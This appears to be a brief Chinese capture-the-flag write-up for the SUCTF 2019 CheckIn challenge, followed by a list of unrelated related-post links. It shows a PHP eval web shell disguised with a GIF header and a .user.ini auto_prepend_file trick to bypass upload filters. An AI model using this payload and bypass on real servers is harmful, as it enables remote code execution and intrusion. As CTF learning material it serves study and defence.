[SUCTF 2019]CheckIn1

黑名单过滤后缀'ph',并且白名单image类型要有对应文件头

对<?过滤,改用GIF89a<script language='php'>@eval($_POST'cmd');</script>,成功把getshell.gif上传上去了

尝试用.htaccess将上传的gif当作php解析,但是失败了

根据这篇文章.user.ini文件构成的PHP后门 - phith0n (wooyun.js.org)

上传.user.ini使用auto_prepend_file=<specific_file>将指定文件包含到当前目录下的php文件前

可以看到getshell.gif的文件头已经显示出来了,说明成功包含getshell.gif,后面跟着的一句话木马自然可以运行

连接蚁剑找到flag

相关推荐
曲幽2 天前
你的REST接口还在“过度投喂”数据吗?——FastAPI + GraphQL实战避坑指南
python·fastapi·web·graphql·route·cors·rest·strawberry
带刺的坐椅4 天前
Spring Boot → Solon 注解迁移实战指南:一张对照表说清楚
java·springboot·web·solon
曲幽8 天前
刚部署的 LibreTranslate 频频翻车?我掏出了 20 年前的 StarDict 词典,用 FastAPI 搭了个本地词典翻译 API
python·fastapi·web·translate·goldendict·libretranslate·stardict·pystardict
曲幽9 天前
别再用网页翻译看源码了!你的私人翻译神器LibreTranslate,部署避坑指南来了
python·docker·web·pot·translate·libretranslate·arogstranslate
llz_11214 天前
web-第四次课后作业
前端·spring boot·web
天山@12316 天前
电商系统Web渗透测试实战学习笔记
web·电商系统
xcLeigh17 天前
鸿蒙平台 KeePass 密码管理器适配实战:从 Windows 到 鸿蒙PC 的 Electron 迁移指南
windows·electron·web·harmonyos·加密算法·keepass
一拳一个娘娘腔17 天前
【第五期】漏洞攻防-逻辑篇:越权与支付漏洞 —— 为什么改个参数就能“0元购”?
安全·web安全·web
持敬chijing17 天前
Web渗透之前后端漏洞-文件下载漏洞
sql·web安全·网络安全·网络攻击模型·web
飞天狗11119 天前
零基础JavaWeb入门——第2课:让网页“活”起来 —— JSP是什么?
java·开发语言·前端·后端·web